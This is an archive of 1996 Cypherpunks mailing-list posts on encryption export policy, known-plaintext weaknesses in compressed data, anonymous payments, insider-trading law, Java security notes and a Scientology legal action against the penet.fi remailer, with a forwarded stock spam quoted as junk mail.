      Cryptography 
 
   M  Other Looming Issues Related to Cryptography Policy 
 
   N  Federal Information Processing Standards 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 2 Jun 1996 19:06:01 +0800
To: "cypherpunks@toad.com>
Subject: RE: Riding online elevators  (Was CNN: Anonymous Stock Tips)
Message-ID: <01BB5023.866A2000@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Anonymous

In my mail this morning was this bit of spam, I never heard of this guy 
before, Likely scooped my mailing address from misc.invest.stocks.

-Newman
.....................................................................

No, I received it as well.   Must have taken names@addresses from the list.

     ..
Blanc


--Fwd--
>http://chancellor.stockpick.com
>
>I just got wind that Chancellor Group is reporting big quarterly earnings.
>SGA Goldstar is just sending out a "buy" recommendation.  I understand other 
>investment advisors are looking to recommend CHAG. The company has a 
>strong book value.  The short sellers need to cover.  This looks like a 
>good situation to me.  What do you think?  They are located at:
>
>http://chancellor.stockpick.com
>
>Bruce Keller, 203-869-8137
>
>To terminate from my Internet Investment Opportunities, Reply to  
>term@portlandweb.com with "remove" in the subject field. 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 2 Jun 1996 10:58:32 +0800
To: cypherpunks@toad.com
Subject: Hello there!Re: Where does your data want to go today?
Message-ID: <199606020009.CAA03429@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone who claimed to be David F. Ogren said on Sat, 1 Jun 1996:

> > The brute force system decrypts the first, and second blocks (8
> > bytes each) of the cyphertext, XORs them, and compares the result
> > with "PKZIP2.1".  If the comparison is equal it has the key.

> I will concede that having a known header, such as a PKZIP header,
> does weaken a crypto to certain degree, but I still believe that it is
> not a significant problem.  Here's why:

Why not simply use two session keys, and encrypt the headers with one 
while encrypting the actual data with the other? That seems to solve both 
problems, except that more CPU cycles are required.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 2 Jun 1996 17:51:32 +0800
To: snow <snow@smoke.suba.com>
Subject: Come to think of it (was Something that just crossed my mind....
Message-ID: <199606020734.DAA20016@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 30 May 96 at 22:35, snow wrote:

> 	In some of the discussion on this list there has been some concern
> about the governments position on anonymous fund transfers. Well, maybe
> concern is incorrect. We _know_ (or should) what it is. They are dead set
> against it. 

Hm.

The more I think about it, the more that it seems foolish to be 
against anonymous payee systems.  Mainly because those who want it 
now (and who will want it in the future) and who have the resources 
will already have it.

As for catching tax-evaders, criminals, etc... for most the five 
BMWs, indoor heated pool and yacht should be enough attention for 
those who really want to know.  Of course the gov't isn't that 
interested in doing the legwork... better for them to have everything 
on a computer for easy data-crunching rather than do real footwork. 
(Can you say downsizing? Nah.... they'd put twice the savings into 
useless gadgets like attack helicopters to patrol minority 
neighborhoods with...)

Off the track, slightly:

It seems the effect that these laws have are to make it so only the 
very wealthy and connected (or perhaps incredibly ambitious and 
smart) have access to privacy and de facto loopholes in the law.
The only "criminals" who will be able to get away with anything are 
those who are already so well off (and possibly buddy-buddy with the 
Powers That Bee, Bzzt!).

[..]
> 	The discussion here seems to assume that business will accept, or
> even welcome the ability of it's customers to remain unknown, or nymknown.
> It is my position (until proven wrong--please) that larger business DON'T
> want anonymity. They _want_ to be able to track purchases and use of their
> product for several reasons. 

Good point. But many consumers want anonymity, or at least to control 
what information they give customers.  Many might even settle for 
pseudo-anonymity (ie, account number 123456 likes to buy product X, 
but whoever 123456 *is* is known only to 123456....).

[..]
> 	The questions that this raises are:
> 
> 	1) Am I full of shit. This is very possible. 

Everyone is at some time or another, unless you never eat.

[..]



--Mutant Rob. 

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 2 Jun 1996 18:00:15 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <199606020741.DAA20077@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  1 Jun 96 at 21:59, Duncan Frissell wrote:

> I'm afraid that some courts have explicitly held that "the child does not
> have a right to liberty but only a right to custody."  That is old law,
> however.  Kids have lost many rights recently too including gun rights, etc.

....which dates back to laws that said women and children were mens' 
possessions.  Very archaic.

A case from several years ago comes to mind.  Apparently a federal(?) 
court ruled that a 16-yr-old girl's parents were in the legal right 
to burn her krshna books and ban her from practicing it. [There was a 
protest in downtown SF sometime in 1989 or '90 about this.]

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 2 Jun 1996 17:51:42 +0800
To: cypherpunks@toad.com
Subject: Re: Compressed data vulnerable to known-plaintext?
Message-ID: <199606020748.DAA20117@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  1 Jun 96 at 19:13, anonymous-remailer@shell.port wrote:

[..]
> But then you still have the problem of identifying the contents.  If there
> were no headers, one could not tell if the message was compressed using
> ZIP, LHA, StuffIt, tar*, compress, gzip, Alice's Magical Supercompressor,
> or even if it was left alone.  One could also not tell if the decryption
> happened successfully.

Actually you could, since the actual encoding isn't random. It means 
something to the compressor.  And if you know something about 
compression algorithms you could probably make some good estimates. 
(I've seen some arguments that bit-wise a compressed file is easier 
to make a known plaintext attack against than an uncompressed text 
file...)

Try taking various small (but compressable) text files that are 
different and run them through compressors.  Ignore the usual 
compressor header information and look at a hex dump of the 
compressed data... think about it in terms of bits.  Look at the 
algorithm that encoded the data.

A good way to avoid known plaintext is to use a feedback mode with a 
random IV (from a good RNG!).  Not perfect, of course...

Rob.


 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daemon@anon.penet.fi
Date: Sun, 2 Jun 1996 13:34:41 +0800
To: cypherpunks@toad.com
Subject: Reply to anonymous ping.
Message-ID: <9606020233.AA05600@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Your code name is: an611909@anon.penet.fi.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 2 Jun 1996 22:06:09 +0800
To: Rich Graves <tcmay@got.net>
Subject: Re: WSJ on "IRS-bashing"
Message-ID: <2.2.32.19960602111135.009e740c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:01 PM 5/29/96 -0700, Rich Graves wrote:

>Fascinating. Could you provide citations to these laws so that people in
>this plane of reality might take a look at them? Over here, any such law
>would be invalidated by R.A.V. v. St. Paul. The only exceptions are
>restrictions on "fighting words" that meet the tests in Chaplinsky v. New
>Hampshire and "hostile working environment" discrimination, which I assume
>is what you're talking about, in some elliptical way.

Pittsburgh Press vs Pittsburgh Human Relations Commission (sex specific help
wanted advertizing outlawed).  Various Fair Housing Laws ("we don't rent to
your kind here" punishable by confiscation of property).  Civil Rights Act
of 1964 (verbal expressions of discrimination in the course of employment,
housing, or service in public accommodations punished in numerous ways).
Expressions of ill-will towards the President or members of his family
punishable as threats in circumstances where similar comments made about
anyone else would not be actionable.  

Note that work is a big part of most people's lives and there are
substantial governmental restrictions imposed on speech in the work place
with fellow employees and customers.  

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 2 Jun 1996 23:16:44 +0800
To: bart@netcom.com (Harry Bartholomew)
Subject: Re: Riding online elevators  (Was CNN: Anonymous Stock Tips
Message-ID: <199606021259.IAA21895@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  2 Jun 96 at 1:00, Harry Bartholomew wrote:

> > In my mail this morning was this bit of spam, I never heard of this guy 
> > before, Likely scooped my mailing address from misc.invest.stocks.
[..]
>     No. Seems to have gone to all cypherpunks.  I've never heard of 
>     misc.invest.stocks.

The only time I saw it was in that post... thankfully.

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 2 Jun 1996 17:22:15 +0800
To: cypherpunks@toad.com
Subject: Riding online elevators  (Was CNN: Anonymous Stock Tips)
Message-ID: <199606020638.IAA15227@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


In my mail this morning was this bit of spam, I never heard of this guy 
before, Likely scooped my mailing address from misc.invest.stocks.

-Newman

--Fwd--
>http://chancellor.stockpick.com
>
>I just got wind that Chancellor Group is reporting big quarterly earnings.
>SGA Goldstar is just sending out a "buy" recommendation.  I understand other 
>investment advisors are looking to recommend CHAG. The company has a 
>strong book value.  The short sellers need to cover.  This looks like a 
>good situation to me.  What do you think?  They are located at:
>
>http://chancellor.stockpick.com
>
>Bruce Keller, 203-869-8137
>
>To terminate from my Internet Investment Opportunities, Reply to  
>term@portlandweb.com with "remove" in the subject field. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Mon, 3 Jun 1996 03:40:56 +0800
To: cypherpunks@toad.com
Subject: Re: Java Crypto API questions
Message-ID: <v02140b01add765d5419c@[17.128.200.24]>
MIME-Version: 1.0
Content-Type: text/plain


>Today, CP's own Marianne Mueller was scheduled to give a talk at JavaOne on
>the eagerly awaited (at least by this user) Java Crypto API.

Here are my notes (and between-the-lines observations) from the Java crypto
sesions (which were very well received). Watch the Java web sites for
transcripts from JavaOne sessions. (but I don't know if the BOF will be
available).

-- Security is *important* -- zero tolerance for security bugs.
   Gosling said in his keynote that it changes things when people
   send their bug reports to USA Today.
-- They're working with standards folk: W3C, IETF.
-- Clean, simple design, paying attention toll aspects of security
   design: language, virtual machine, components (libraries).
-- Adding digital signatures to code enables greater trust -- the
   user can allow an applet to "escape from the sandbox."
-- Policies = Assertions + Capabilities. That's what my notes
   say -- I think it means that the user can use a signature
   to authenticate the applet's author/publisher and allow it
   greater capabilities. For example, a stock trading applet
   might be granted the capability to access a stock price service
   (Dow Jones) *and* a stock trading service. The current applet
   model only allows remote connection to the site that distributed
   the applet.
-- Java will allow signing archives (a set of classes and resources).

-- Network-centered security: digital signatues, encryption, key exchange,
   hash, bignum, random number generators.
-- Packages (third-party applets) communicate with security packages
   through an abstract layer. There may be multiple packages.
-- They will provide a secure key storage (like Apple's PowerTalk
   today, I presume) where "all" of your keys are held under a
   a single password. Rogue applications (applets?) can't leak keys.
-- Feedback to security-api@java.sun.com.
-- There's a white paper on the verifyier on the sun web site.
-- They're writing a security policy for applications (applications
   function like "ordinary" Unix/Mac/whatever applications.
-- User preference to designate capabilities for signed/unsigned
   applets.

---- ---- ----
Notes from the security birds of a feather session
---- ---- ----

-- Need multiple security managers: if any say no, reject the request.
-- Servet, applet need different security managers.
-- Problem with firewalls: client accesses server via firewall via
   proxy servers. May not be able to open a URL directly.
-- Java Commerce API coming for payment functions.
-- Problem with foreign applet vendors: how can a non-US security
   class vendor certify a class to be used (outside the US).
   Currently, it must be imported and signed by Sun. But, then
   it can't be exported without a Commerce Department license.
   No (current) plans to establish a signing authority outside
   of the U.S.

Martin Minow
minow@apple.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: test921148@alpha.c2.org
Date: Mon, 3 Jun 1996 04:04:07 +0800
To: cypherpunks@toad.com
Subject: premail manual info
Message-ID: <199606021630.JAA10996@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Whopee! Just installed premail. But I have a Question on how to
use it. I need some Manual explaining how to use Premail
and what can I put into its Configuration-file. I use Version
0.43 of Premail. The perl Script is somewhat readable but it is
better if some User-manual was available.

Send Answers to test921148@alpha.c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Mon, 3 Jun 1996 03:35:05 +0800
To: cypherpunks@toad.com
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
Message-ID: <v02140b02add76c92d750@[17.128.200.24]>
MIME-Version: 1.0
Content-Type: text/plain


>
>One of the oldest tricks for running a stock up (or down) is
>to put rumor teams on elevators in the financial district of
>major cities.

It would be more efficient to talk about the rumor on a cellular
phone.  Probably make a nice sting scenario, too.

Martin Minow (who expects a cut of the reward money).
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 3 Jun 1996 05:14:10 +0800
To: cypherpunks@toad.com
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <199606021726.KAA29200@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:45 PM 6/1/96 -0700, Timothy C. May wrote:
>At 1:59 AM 6/2/96, Duncan Frissell wrote:
>
>>Of course curfew laws only control the inarticulate and scruffy.  Well
>>dressed children (coat and tie for the boys dress or suit for the girls) who
>>can claim that they are out doing tons of protected things like work and
>>school and worship and political campaigning and "trying to save street
>>children for Jesus" will not be picked up.  They can also say things like
>
>This, by the way, is the main thing that concerns certain civil rights
>groups (including the Santa Cruz chapter of the ACLU). They say they'll be
>monitoring enforcement patterns to see if more "children of color" are
>picked up than their percentage in the population represents.

This, the curfew situation, is yet another of the reasons I'd favor "playing 
hardball" with the government.  I'm very much against discriminatory 
enforcement, but on the other hand I don't think my liberty should be 
dependent on getting an organization like the ACLU to look out for and 
complain against discrimination against me. 
 
I feel if a group of left-handed albinos think the police are being too hard 
on left-handed albinos, they shouldn't have to convince the ACLU of this, 
and should be entitled and able to fight back effectively and prevent what 
they view as abuse.  True, such a situation may occasionally lead to abuses, 
but I strongly expect that those abuses will be far fewer than the current 
system.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 3 Jun 1996 05:10:40 +0800
To: cypherpunks@toad.com
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
Message-ID: <add71e4c06021004bdfb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:30 PM 6/2/96, Martin Minow wrote:
>>
>>One of the oldest tricks for running a stock up (or down) is
>>to put rumor teams on elevators in the financial district of
>>major cities.
>
>It would be more efficient to talk about the rumor on a cellular
>phone.  Probably make a nice sting scenario, too.

An interesting example, but I'm having a hard time figuring out who has
committed a crime, even by SEC rules.

Namely, are the people "talking up" a stock committing a crime? Even if the
SEC forbids this (under defined circumstances and for defined persons, as
most of us are not covered by any such laws), how can talking over a
"putatively secure" cell phone be construed as talking up a stock?

And, how can someone who acts on overheard information--as in the elevator
example Sandy cited--be charged with any crime? Unless they are "insiders,"
covered by SEC rules about trading, they are free to act on essentially
anything they hear. "He who hesitates to act on inside information is
lost."

(To elaborate on this: I was never classified as an "insider" during my
time at Intel, and I certainly bought and sold the stock based on what
products and news I knew was coming out or what rumors I'd heard. Only a
select group of executives and staff in the specific departments generating
earnings announcements, auditing, etc., were covered. And senior executives
are covered by various rules about trading stocks. And family members and
friends may be covered, if they learn of "inside" (in the SEC sense)
information. But ordinary people, even employees of a company, are not
considered to be "insiders" and hence are not covered by insider trading
laws.)

So, the only way I can imagine the cell phone case leading to an insider
trading charge is if the cell phone users _knew_ that the cell phones were
not secure, and _planned_ to have their conversations overheard. The people
doing the intercepting could be charged under one of the laws covering
unauthorized interception of cell phone conversations, but probably not for
insider trading.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John D. Ervin" <jervin@server1.netpath.net>
Date: Mon, 3 Jun 1996 01:59:52 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606021453.KAA11735@server1.netpath.net>
MIME-Version: 1.0
Content-Type: text/plain


list
 
John D. Ervin
Also known as "Felix1" 
jervin@netpath.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 3 Jun 1996 06:06:57 +0800
To: cypherpunks@toad.com
Subject: Re: Java Crypto API questions
Message-ID: <199606021828.LAA01244@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:30 AM 6/2/96 -0700, Martin Minow wrote:
>>Today, CP's own Marianne Mueller was scheduled to give a talk at JavaOne on
>>the eagerly awaited (at least by this user) Java Crypto API.

>---- ---- ----
>Notes from the security birds of a feather session
>---- ---- ----
>
>-- Need multiple security managers: if any say no, reject the request.
>-- Servet, applet need different security managers.
>-- Problem with firewalls: client accesses server via firewall via
>   proxy servers. May not be able to open a URL directly.
>-- Java Commerce API coming for payment functions.
>-- Problem with foreign applet vendors: how can a non-US security
>   class vendor certify a class to be used (outside the US).
>   Currently, it must be imported and signed by Sun. But, then
>   it can't be exported without a Commerce Department license.
>   No (current) plans to establish a signing authority outside
>   of the U.S.

We've heard this assertion before.  Why not import the software, generate a 
detachable signature, and then export the signature for re-attachment overseas?

Surely export of signatures isn't controlled (even arguably) by ITAR.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 3 Jun 1996 06:43:27 +0800
To: cypherpunks@toad.com
Subject: Insider Trading and Inside Information
Message-ID: <199606021915.MAA26734@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

 > And, how can someone who acts on overheard information--as
 > in the elevator example Sandy cited--be charged with any
 > crime? Unless they are "insiders," covered by SEC rules
 > about trading, they are free to act on essentially anything
 > they hear. "He who hesitates to act on inside information is
 > lost."

 > (To elaborate on this: I was never classified as an
 > "insider" during my time at Intel, and I certainly bought
 > and sold the stock based on what products and news I knew
 > was coming out or what rumors I'd heard. Only a select group
 > of executives and staff in the specific departments
 > generating earnings announcements, auditing, etc., were
 > covered. And senior executives are covered by various rules
 > about trading stocks. And family members and friends may be
 > covered, if they learn of "inside" (in the SEC sense)
 > information.

The SEC, in cooperation with the courts, has been gradually
shifting the definitions of "insider" and "inside information" to
more all-encompassing ones.

It used to be that an insider was an officer of the company, or
someone with a fiduciary relationship to the firm, such as a
auditor or investment banker with which the firm did business.
Inside information was also similarly limited to a narrow
collection of material subject to regulatory restrictions on its
disclosure.

Nowdays "inside information" has been expanded to include
anything that the general public is not privy to, and "insiders"
can be almost anyone as well.

Indeed, the current definitions can subject to criminal sanctions
low level employees trading their company's stock on the basis of
rumors, or newspaper columnists trading in anticipation of
reaction to their published speculations.  It's not even safe to
trade on what formerly would have been known as "hot tips" any
more, unless the average person in the street had a mechanism to
access the information.

The legal theory behind all this is that anyone, no matter who
they are, trading on any publicly unavailable information, no
matter what it is, might be perceived as profiting at the expense
of the zillions of ordinary investors, whose continued playing of
the Stock Lottery^H^H^H^H^H^H^H Market the govermment and big
business definitely want to encourage.  Not to mention the huge
public support for the prosecution of anyone who the public
thinks has "gotten away with something" that Joe Six-Pack didn't
have the opportunity to do, and made a few bucks in the process.

If this trend continues, I won't even be able to take an Intel
janitor to lunch, and trade the stock based on his impression
that Andy Grove looked particularly happy while having his office
cleaned, without risking an "insider trading violation" should
the stock go up.

A new and interesting manifestation of the "Surveilance State."

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Mon, 3 Jun 1996 05:00:24 +0800
To: cypherpunks@toad.com
Subject: INFO: Sen. Burns urges White House to follow NRC recommendations (6/2/96)
Message-ID: <199606021726.NAA27994@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


=============================================================================
          ____                  _              _   _
         / ___|_ __ _   _ _ __ | |_ ___       | \ | | _____      _____
        | |   | '__| | | | '_ \| __/ _ \ _____|  \| |/ _ \ \ /\ / / __|
        | |___| |  | |_| | |_) | || (_) |_____| |\  |  __/\ V  V /\__ \
         \____|_|   \__, | .__/ \__\___/      |_| \_|\___| \_/\_/ |___/
                    |___/|_|

       SEN. CONRAD BURNS URGES CLINTON TO REASSES ENCRYPTION POLICY AND
               ANNOUNCES HEARINGS ON THE ISSUE for 6/12/96

      REP. RICK WHITE (R-WA) SCHEDULED FOR HOTWIRED CHAT 6/5/96 9-10PM EST
      SEN. CONRAD BURNS (R-MT) SCHEDULED FOR HOTWIRED CHAT 6/11/96 10-11PM EST

                              Date: June 2, 1996

         URL:http://www.crypto.com/            crypto-news@panix.com
           If you redistribute this, please do so in its entirety,
                         with the banner intact.
-----------------------------------------------------------------------------
Table of Contents
        News
        Text of Sen. Burns' letter to President Clinton
        How to receive crypto-news

-----------------------------------------------------------------------------
NEWS

Sen. Conrad Burns (R-MT), principal co-sponsor of legislation to ease
restrictions on encryption, yesterday sent President Clinton a letter
urging the Administration to reassess its encryption policy in light
of a recent report by the National Research Council.

The findings contained in the NRC study, released at a briefing in
Washington DC on Thursday, raise serious questions about the rational
for the Administration's current approach to cryptography policy.  The
study states explicitly, "Current national cryptography policy is
not adequate to support the information security requirements of an
information society."

In his letter to the President, Senator Burns said that the NRC study
presents overwhelming evidence that the current approach to encryption
policy has failed.  Burns also pledged to hold hearings in the Senate
Commerce Committee on June 12 and 26.

The night before the hearings (June 11 at 10 pm ET), Senator Burns
will be live online at HotWired (http://www.hotwired.com/wiredside). Be
sure to save the date and stop by to talk with the Senator about his
efforts to encourage the widespread availability of strong encryption
and get a preview of the hearings on the Pro_CODE bill.

Information on Senator Burns' legislation, as well as information on the
NRC report, is available at http://www.crypto.com


                                DON'T FORGET!

Representative Rick White (R-WA) will be on HotWired Wednesday June 5th
at 9pm EST at http://www.hotwired.com/wiredside/  You can tune in and listen
to the chat with the RealAudio software (http://www.realaudio.com).  You can
ask questions of the Representative through a moderator and get real,
immediate responses.

-----------------------------------------------------------------------------
TEXT OF SEN. BURNS' LETTER TO PRESIDENT CLINTON

                              May 30, 1996

The President
The White House
Washington, D.C. 20500

Dear Mr. President,

I urge you to reassess the administration's position on cryptography
policy in light of the report released today by the National Research
Council,  "Cryptography's Role in Securing the Information Society."
The report was put together by the NRC Committee to Study National
Cryptography, which included members from across the spectrum of the
business, academic, defense and intelligence communities.  The fact
that such a diverse  roster of our brightest minds could achieve
consensus after taking two years to pore over the details of encryption
policy is remarkable, and their recommendations should be taken most
seriously.

The acronym of the report's title-CRISIS-is especially apt given the
massive economic and national security costs of the current policy,
which severely restricts the export of software containing strong
encryption.   As the report states, "Current national cryptography
policy is not adequate to support the information security requirements
of an information society.  Indeed, current policy discourages the use
of cryptography, whether intentional or not, and in so doing impedes
the ability of the nation to use cryptographic tools that would help to
remediate certain important vulnerabilities."  As the Chairman of the
NRC Committee to Study National Cryptography, Kenneth Dam, states in
the report "the crisis is a policy crisis, rather than a technology
crisis, an industry crisis, a law enforcement crisis, or an
intelligence-gathering crisis..."

The most recent version of the administration's policy, as reflected in
the draft white paper of the interagency working group on encryption,
unfortunately reveals a continuing commitment to government-imposed
mandates rather than private-sector solutions.  The proposal, which was
quickly dubbed "Clipper III" because of its close alignment with the
earlier rejected Clipper schemes, has the support of neither the
software industry nor the Net community.

Indeed, as the Committee noted, an essential flaw behind the
administration's policy is the continuing reliance on the national
security and law enforcement communities to drive the policy through
administrative diktat rather than open legislative action.   As the
report states, rather than vainly attempting to reign in the inevitable
widespread use of  strong encryption, the administration should be
actively promoting it.  The use of strong encryption has become vital
to both ensuring the privacy of individuals and fostering the growth of
the Global Information Infrastructure into the 21st century.  As for
the national security aspects of encryption policy, the report states
that cryptography can protect proprietary information and reduce
economic espionage.  In addition, strong encryption can protect
nationally sensitive information systems and networks against
unauthorized penetration.  Therefore, the use of strong encryption
serves to protect national security rather than hinder it.  Simply put,
"on balance, the advantages of more widespread use of cryptography
outweigh the disadvantages."


I further call your attention to specific recommendations by the Committee:

*National cryptography policy should be developed by the executive and
 legislative branches on the basis of open  public discussion and
 governed by the rule of law.

*No law should bar the manufacture, sale, or use of any form of encryption
 within the United States.

*Export Controls on cryptography should be progressively relaxed.

*The U.S. government should promote the security of the telecommunications
 networks more actively.

*The U.S. government should take steps to assist law enforcement and
 national security to adjust to new technical realities of the information
 age.

*Aggressive government promotion of escrowed encryption is not appropriate...

*The debate over national cryptography policy can be carried out in a
 reasonable manner on an unclassified basis.

*National cryptography policy  affecting the development and use of
 commercial cryptography should be more closely aligned with market forces.

A core recommendation of the Committee is that the administration
foster an open public debate so that a national consensus on
cryptography can be developed.  I agree wholeheartedly and hope that
the public hearings beginning on June 12 in the Commerce Committee's
Subcommittee on Science, Space and Technology, which I chair, will help
foster this process.  Many of the NRC's recommendations are reflected
in the "Burns Pro-CODE bill," S. 1726, which will be debated on that
date, with an additional hearing to be held on June 26.

Now that some of the best scientific and technical minds in the country
have essentially endorsed the position that business and policy
advocates have been taking for years, it's time for the administration
to come around as well.  In conclusion, I can only agree with the
Chairman Dam's statement:

We believe that our report makes some reasonable proposals for national
cryptography policy.  But a proposal for action.  What is needed now is
a public debate, using and not sidestepping the full processes of
government, leading to a judicious resolution of pressing cryptography
policy issues and including, on some important points, legislative
action.  Only in this manner will the policy crisis come to a
satisfactory and stable resolution.


                                        Sincerely,


                                                /s/


                                        Conrad Burns
                                        U.S. Senator


-----------------------------------------------------------------------------
HOW TO RECEIVE CRYPTO-NEWS

To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com)
or send mail to majordomo@panix.com with "subscribe crypto-news" in the body
of the message.
-----------------------------------------------------------------------------
End crypto-news
=============================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Mon, 3 Jun 1996 08:26:22 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: Java Crypto API questions
Message-ID: <v02140b04add7b4e6d800@[17.128.203.227]>
MIME-Version: 1.0
Content-Type: text/plain


Jim Bell writes:
>>-- Problem with foreign applet vendors: how can a non-US security
>>   class vendor certify a class to be used (outside the US).
>>   Currently, it must be imported and signed by Sun. But, then
>>   it can't be exported without a Commerce Department license.
>>   No (current) plans to establish a signing authority outside
>>   of the U.S.
>
>We've heard this assertion before.  Why not import the software, generate a
>detachable signature, and then export the signature for re-attachment overseas?
>

I suspect (but don't have any direct knowledge) that strong crypto
classes are distributed after encryption by Sun's private key. The
corresponding public key is enbedded in the Java Class Loader and/or
virtual machine (or the security framework class -- I'm only speculating
here).

This means that "rogue" encryptors can't work under Sun's security
manager as they will be rejected as "unloadable"

Martin Minow
minow@apple.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deana Holmes" <mirele@xmission.com>
Date: Mon, 3 Jun 1996 08:23:06 +0800
To: cypherpunks@toad.com
Subject: penet to be compromised again? More Scientology lawsuit crap
Message-ID: <199606022055.OAA17534@xmission.xmission.com>
MIME-Version: 1.0
Content-Type: text/plain


I just received some information on IRC channel #scientology that 
Julf Helsinghuis is being sued by $cientology *yet again* for a name.

Apparently this has to do with the deposition request to Homer Wilson 
Smith (lightlink.com).  Scamizdat #3 was posted through lightlink.com 
and the $cientologists have wanted for a long time to figure out who 
did it.  (Which is why they sued Grady Ward.)  Homer, in response to 
the deposition request, consulted his logs, and said that the 
original post came from penet.fi.  So $cientology has apparently gone 
to the Finns again to ask that Julf be forced to give up the name.

I'm appending a copy of the IRC log, as I'm too lazy to edit it down 
to particulars.  It includes the name of the police officer involved 
(Kaj Malmberg) as well as a Finnish newsgroup and article id for the 
whole story.  If someone knows Finnish and can give a rough 
translation, it would be terribly appreciated by a lot of people.

<enclosed IRC transcript>

<Ignatius> hi guys... do you have the latest news on Julf 
   Helsingius' case?
> Ig: what do you mean, latest news?
<Sherilyn> The julf case?
* Sherilyn didn;t know there _was_ a julf case...
<Ignatius> ok... copyright offences are crimes under Finnish 
   law, not torts. 
<Ignatius> Kaj Malmberg, the Finnish police officer who handles 
   the investigation of the copyrighted material through 
   penet.fi, posted an article to a domestic newsgroup today. 
<Sherilyn> Do you have the message-id and group name?
<Ignatius> the scienos have filed a motion at a local court in 
   Helsinki to force Julf Helsingius to give out the name of 
   the poster. 
<Ignatius> sherilyn, are you good at Finnish?
<Sherilyn> ig: lol!
